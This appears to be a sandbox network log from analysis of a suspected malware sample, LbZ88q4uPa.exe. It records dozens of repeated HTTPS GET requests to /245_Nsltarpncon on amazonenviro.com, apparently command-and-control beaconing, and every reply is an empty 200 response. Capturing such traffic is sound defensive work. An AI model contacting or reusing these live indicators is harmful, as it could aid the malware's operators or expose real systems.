                    2025-01-14 07:23:42 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:42 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:42 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.449791166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:43 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:44 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:44 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.449793166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:45 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:46 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:45 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.449795166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:47 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:47 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:47 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.449797166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:48 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:49 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:49 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.449799166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:50 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:50 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:50 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.449801166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:51 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:52 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:52 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.449803166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:53 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:54 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:53 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.449805166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:55 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:55 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:55 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.449808166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:56 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:57 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:57 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.449811166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:23:58 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:23:58 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:23:58 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.449818166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:00 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:00 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:00 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.449830166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:01 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:02 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:02 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.449846166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:03 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:04 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:03 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.449859166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:05 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:05 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:05 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.449871166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:06 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:07 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:07 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.449883166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:08 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:08 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:08 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.449895166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:10 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:10 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:10 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.449907166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:11 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:12 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:12 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.449919166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:13 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:13 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:13 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.449930166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:14 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:15 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:15 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.449942166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:16 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:17 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:16 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.449954166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:18 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:18 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:18 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.449967166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:19 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:20 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:20 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.449982166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:21 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:21 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:21 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.449992166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:23 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:23 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:23 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.450004166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:24 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:25 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:24 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.450016166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:26 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:26 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:26 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.450028166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:27 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:28 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:28 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.450038166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:29 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:29 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:29 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.450050166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:31 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:31 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:31 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.450061166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:32 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:33 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:33 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    58192.168.2.450073166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:34 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:34 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:34 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.450087166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:35 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:36 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:36 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.450099166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:37 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:38 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:38 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.450112166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:39 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:39 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:39 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    62192.168.2.450124166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:41 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:41 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:41 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    63192.168.2.450129166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:42 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:43 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:43 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    64192.168.2.450131166.62.27.1884437308C:\Users\user\Desktop\LbZ88q4uPa.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:24:44 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
